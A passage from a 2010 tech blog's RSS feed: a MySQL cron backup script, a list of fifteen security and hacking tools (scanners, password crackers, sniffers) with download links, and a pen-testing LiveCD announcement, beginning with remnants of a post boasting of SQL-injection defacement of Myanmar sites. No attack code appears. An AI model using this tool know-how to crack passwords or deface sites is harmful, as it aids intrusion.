			<a href="http://heinhtetaung.ulmb.com/?p=103&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=103&amp;title=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=103&amp;t=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=103&amp;title=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=103&amp;t=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8+-+http://b2l.me/7k328&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8&amp;body=Link: http://heinhtetaung.ulmb.com/?p=103 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Hacked%20%E1%80%81%E1%80%B6%E1%80%91%E1%80%AC%E1%80%B8%E1%80%9B%E1%80%B1%E1%80%9E%E1%80%AC%20%E1%80%BB%E1%80%99%E1%80%94%E1%80%B9%E1%80%99%E1%80%AC%E1%80%86%E1%80%AD%E1%80%AF%E1%80%92%E1%80%B9%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8%20..%0D%0A%0D%0Asql%20injection%20%E1%82%8F%E1%80%BD%E1%80%84%E1%80%B9%E1%80%B7%20deface%20%E1%80%91%E1%80%AC%E1%80%B8%E1%80%BB%E1%80%81%E1%80%84%E1%80%B9%E1%80%B8%20%E1%80%BB%E1%80%96%E1%80%85%E1%80%B9%E1%80%9E%E1%80%8A%E1%80%B9%E1%81%8B%E1%80%86%E1%80%AD%E1%80%AF%E1%80%92%E1%80%B9%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8%20%E1%80%80%E1%80%AD%E1%80%AF%20.htaccess%20%E1%82%8F%E1%80%BD%E1%80%84%E1%80%B9%E1%80%B7%20%E1%80%95%E1%80%AD%E1%80%90%E1%80%B9%E1%80%95%E1%80%84%E1%80%B9%E1%80%BB%E1%80%81%E1%80%84%E1%80%B9%E1%80%B8%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8%20%E1%80%BB%E1%80%95%E1%80%B3%E1%80%9C%E1%80" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=103&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D103&amp;t=Hacked%20myanmar%20sites%20%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8" id="facebook_share_button_103" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_103') || document.getElementById('facebook_share_icon_103') || document.getElementById('facebook_share_both_103') || document.getElementById('facebook_share_button_103');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_103') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=103</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Daily/weekly/monthly Mysql database backup with cron</title>
		<link>http://heinhtetaung.ulmb.com/?p=94</link>
		<comments>http://heinhtetaung.ulmb.com/?p=94#comments</comments>
		<pubDate>Thu, 17 Jun 2010 05:47:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>
		<category><![CDATA[Scripts]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=94</guid>
		<description><![CDATA[Smart Mysql database backup with cron
Create and assign a DB user to the DB you want to backup with all privileges from your Cpanel >> Mysql section.
following is a simple script to take backup using cron. Just create the file, chmod it to 750 and execute it using cron.

#/bin/bash
/usr/bin/mysqldump –user=db_User –password=xyz –databases db_name &#124; gzip [...]]]></description>
			<content:encoded><![CDATA[<p>Smart Mysql database backup with cron<br />
Create and assign a DB user to the DB you want to backup with all privileges from your Cpanel >> Mysql section.<br />
following is a simple script to take backup using cron. Just create the file, chmod it to 750 and execute it using cron.</p>
<p><code></p>
<p>#/bin/bash<br />
/usr/bin/mysqldump –user=db_User –password=xyz –databases db_name | gzip > /home/foo/db_name-`date “+%Y%m%d%H%M”`.sql.gz</p>
<p></code><br />
where,<br />
db_user is your database user who has access on your database.<br />
db_name is the database name you are scheduling backup for.<br />
xyz is the actual password of above database user.<br />
+%Y%m%d%H%M is the time stamp which will help to distinguish between backup date and time.<br />
the backup destination in above example is “/home/foo/”</p>
<p>add following line in cron to take backup everyday at 23:00 and will store in separate file<br />
<code><br />
0 23 * * * /PathToScript.sh<br />
</code><br />
Security notes Note ::<br />
1) Dont use the command directly in cron. Put the command in a file and execute that file in cron.<br />
2) I asked to chmod to 750 so that other will not be able to view your files.<br />
If the file is readable by others anyone may view it and get your DB access very easily.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=94&amp;n=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=94&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=94&amp;title=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=94&amp;t=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=94&amp;title=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=94&amp;t=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron+-+File: /data/app/webapp/functions.php<br />Line: 7<br />Message: Too many connections&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Daily%2Fweekly%2Fmonthly+Mysql+database+backup+with+cron&amp;body=Link: http://heinhtetaung.ulmb.com/?p=94 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Smart%20Mysql%20database%20backup%20with%20cron%0D%0ACreate%20and%20assign%20a%20DB%20user%20to%20the%20DB%20you%20want%20to%20backup%20with%20all%20privileges%20from%20your%20Cpanel%20%3E%3E%20Mysql%20section.%0D%0Afollowing%20is%20a%20simple%20script%20to%20take%20backup%20using%20cron.%20Just%20create%20the%20file%2C%20chmod%20it%20to%20750%20and%20execute%20it%20using%20cron.%0D%0A%0D%0A%0D%0A%0D%0A%23%2Fbin%2Fbash%0D%0A%2Fusr%2Fbin" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=94&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D94&amp;t=Daily%2Fweekly%2Fmonthly%20Mysql%20database%20backup%20with%20cron" id="facebook_share_button_94" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_94') || document.getElementById('facebook_share_icon_94') || document.getElementById('facebook_share_both_94') || document.getElementById('facebook_share_button_94');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_94') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=94</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 15 Security/Hacking Tools &amp; Utilities</title>
		<link>http://heinhtetaung.ulmb.com/?p=91</link>
		<comments>http://heinhtetaung.ulmb.com/?p=91#comments</comments>
		<pubDate>Sun, 13 Jun 2010 06:22:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>
		<category><![CDATA[Tools/Utilities]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=91</guid>
		<description><![CDATA[1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what [...]]]></description>
			<content:encoded><![CDATA[<p>1. Nmap</p>
<p>I think everyone has heard of this one, recently evolved into the 4.x series.</p>
<p>Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.</p>
<p>Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.</p>
<p><a href="http://www.insecure.org/nmap/download.html">Get Nmap Here</a></p>
<p>2. Nessus Remote Security Scanner</p>
<p>Recently went closed source, but is still essentially free. Works with a client-server framework.</p>
<p>Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.</p>
<p><a href="http://www.nessus.org/download/">Get Nessus Here</a></p>
<p>3. John the Ripper</p>
<p>Yes, JTR 1.7 was recently released!</p>
<p>John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.</p>
<p><a href="http://www.openwall.com/john/">You can get JTR Here</a></p>
<p>4. Nikto</p>
<p>Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).</p>
<p>Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).</p>
<p><a href="http://www.cirt.net/code/nikto.shtml">Get Nikto Here</a></p>
<p>5. SuperScan</p>
<p>Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.</p>
<p>If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.</p>
<p><a href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&#038;subcontent=/resources/proddesc/superscan4.htm">Get SuperScan Here</a></p>
<p>6. p0f</p>
<p>P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:</p>
<p>– machines that connect to your box (SYN mode),<br />
– machines you connect to (SYN+ACK mode),<br />
– machine you cannot connect to (RST+ mode),<br />
– machines whose communications you can observe.</p>
<p>Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.</p>
<p><a href="http://lcamtuf.coredump.cx/p0f/p0f.shtml">Get p0f Here</a></p>
<p>7. Wireshark (Formely Ethereal)</p>
<p>Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.</p>
<p>Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.</p>
<p><a href="http://www.wireshark.org/">Get Wireshark Here</a></p>
<p>8. Yersinia</p>
<p>Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).</p>
<p>The best Layer 2 kit there is.</p>
<p><a href="http://yersinia.sourceforge.net/">Get Yersinia Here</a></p>
<p>9. Eraser</p>
<p>Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.</p>
<p>An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.</p>
<p><a href="http://www.heidi.ie/eraser/download.php">Get Eraser Here.</a></p>
<p>10. PuTTY</p>
<p>PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.</p>
<p><a href="http://www.chiark.greenend.org.uk/~sgtatham/putty/">Get PuTTY Here.</a></p>
<p>11. LCP</p>
<p>Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.</p>
<p>A good free alternative to L0phtcrack.</p>
<p>LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.</p>
<p><a href="http://www.lcpsoft.com/english/download.htm">Get LCP Here</a></p>
<p>12. Cain and Abel</p>
<p>My personal favourite for password cracking of any kind.</p>
<p>Cain &#038; Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.</p>
<p><a href="http://www.oxid.it/cain.html">Get Cain and Abel Here</a></p>
<p>13. Kismet</p>
<p>Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.</p>
<p>A good wireless tool as long as your card supports rfmon (look for an orinocco gold).</p>
<p><a href="http://www.kismetwireless.net/download.shtml">Get Kismet Here</a></p>
<p>14. NetStumbler</p>
<p>Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.</p>
<p>NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:</p>
<p>    * Verify that your network is set up the way you intended.<br />
    * Find locations with poor coverage in your WLAN.<br />
    * Detect other networks that may be causing interference on your network.<br />
    * Detect unauthorized “rogue” access points in your workplace.<br />
    * Help aim directional antennas for long-haul WLAN links.<br />
    * Use it recreationally for WarDriving.</p>
<p><a href="http://www.stumbler.net/">Get NetStumbler Here</a></p>
<p>15. hping</p>
<p>To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.</p>
<p>hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.</p>
<p><a href="http://www.hping.org/">Get hping Here</a></p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=91&amp;n=Top+15+Security%2FHacking+Tools+%26+Utilities&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=91&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=91&amp;title=Top+15+Security%2FHacking+Tools+%26+Utilities" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=91&amp;t=Top+15+Security%2FHacking+Tools+%26+Utilities" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=91&amp;title=Top+15+Security%2FHacking+Tools+%26+Utilities" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=91&amp;t=Top+15+Security%2FHacking+Tools+%26+Utilities" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Top+15+Security%2FHacking+Tools+%26+Utilities+-+http://b2l.me/3csuh&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Top+15+Security%2FHacking+Tools+%26+Utilities&amp;body=Link: http://heinhtetaung.ulmb.com/?p=91 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A 1.%20Nmap%0D%0A%0D%0AI%20think%20everyone%20has%20heard%20of%20this%20one%2C%20recently%20evolved%20into%20the%204.x%20series.%0D%0A%0D%0ANmap%20%28%E2%80%9CNetwork%20Mapper%E2%80%9D%29%20is%20a%20free%20open%20source%20utility%20for%20network%20exploration%20or%20security%20auditing.%20It%20was%20designed%20to%20rapidly%20scan%20large%20networks%2C%20although%20it%20works%20fine%20against%20single%20hosts.%20Nmap%20uses%20r" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=91&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D91&amp;t=Top%2015%20Security%2FHacking%20Tools%20%26%20Utilities" id="facebook_share_button_91" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_91') || document.getElementById('facebook_share_icon_91') || document.getElementById('facebook_share_both_91') || document.getElementById('facebook_share_button_91');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_91') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=91</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Samurai Web Testing Framework 0.6 Released – Web Application Security LiveCD</title>
		<link>http://heinhtetaung.ulmb.com/?p=86</link>
		<comments>http://heinhtetaung.ulmb.com/?p=86#comments</comments>
		<pubDate>Sun, 13 Jun 2010 06:04:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>
		<category><![CDATA[Web Apps]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=86</guid>
		<description><![CDATA[The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites.
It’s been quite a while since the latest fairly major update of SamuraiWTF (around a year [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://heinhtetaung.ulmb.com/wp-content/screenshot.jpg"><img src="http://heinhtetaung.ulmb.com/wp-content/screenshot-150x150.jpg" alt="" title="screenshot" width="150" height="150" class="alignleft size-thumbnail wp-image-89" /></a>The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites.</p>
<p>It’s been quite a while since the latest fairly major update of SamuraiWTF (around a year ago).</p>
<p>This is quite a major release with the integration of metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release.</p>
<p>Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.</p>
<p>The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional linux environment that has a number of the tools pre-installed.</p>
<p>You can download SamuraiWTF v0.8 here:</p>
<p><a href="http://sourceforge.net/projects/samurai/files/samurai/samurai-0.8/samurai-0.8.iso/download">SamuraiWTF v0.8</a></p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=86&amp;n=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=86&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=86&amp;title=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=86&amp;t=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=86&amp;title=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=86&amp;t=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD+-+http://b2l.me/3ckh3&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Samurai+Web+Testing+Framework+0.6+Released+%E2%80%93+Web+Application+Security+LiveCD&amp;body=Link: http://heinhtetaung.ulmb.com/?p=86 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A The%20Samurai%20Web%20Testing%20Framework%20is%20a%20live%20linux%20environment%20that%20has%20been%20pre-configured%20to%20function%20as%20a%20web%20pen-testing%20environment.%20The%20CD%20contains%20the%20best%20of%20the%20open%20source%20and%20free%20tools%20that%20focus%20on%20testing%20and%20attacking%20websites.%0D%0A%0D%0AIt%E2%80%99s%20been%20quite%20a%20while%20since%20the%20latest%20fairly%20major" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=86&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D86&amp;t=Samurai%20Web%20Testing%20Framework%200.6%20Released%20%E2%80%93%20Web%20Application%20Security%20LiveCD" id="facebook_share_button_86" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_86') || document.getElementById('facebook_share_icon_86') || document.getElementById('facebook_share_both_86') || document.getElementById('facebook_share_button_86');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
